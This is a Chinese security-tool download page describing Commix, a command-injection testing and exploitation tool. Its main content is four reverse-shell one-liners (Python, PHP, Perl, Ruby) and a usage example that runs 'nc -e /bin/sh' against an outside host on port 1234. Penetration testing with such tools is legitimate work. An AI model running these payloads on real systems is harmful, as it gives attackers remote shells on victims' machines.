ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全安全工具 → Commix 自动化命令注入测试与利用工具
Commix 自动化命令注入测试与利用工具

Commix 自动化命令注入测试与利用工具

评分:0.0
下载地址
  • 软件介绍
  • 软件截图
  • 同类推荐
  • 相关文章

软件Tags: [db:tag]

Commix 自动化命令注入测试与利用工具

项目简介:

Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了易用性。

在作者所写的使用案例中还附送了一些反弹shell的技巧,如下:

1. Python-reverse-shell:

 
  1. python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"www.cesafe.com\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'

2. PHP-reverse-shell:

 
  1. php-r'\$sock=fsockopen(\"www.cesafe.com\",1234);exec(\"/bin/sh -i <%263 >%263 2>%263\");'

3. Perl-reverse-shell:

 
  1. perl-e'use Socket;\$i=\"www.cesafe.com\";\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/bin/sh -i\");};'

4. Ruby-reverse-shell:

 
  1. ruby-rsocket-e'exit if fork;c=TCPSocket.new(\"www.cesafe.com\",1234);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'

使用方法:

 
  1. root@kali:~/commix# python commix.py --url="http://www.cesafe.com/cmd/normal.php?addr=INJECT_HERE" --os-cmd="nc -e /bin/sh www.cesafe.com 1234"

下载地址

请到网盘下载处下载
展开内容

软件截图

下载地址

  • PC版

相关文章

用户评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

本类推荐

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 琼ICP备2021004244号-1| 琼ICP备2021004244号-1

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网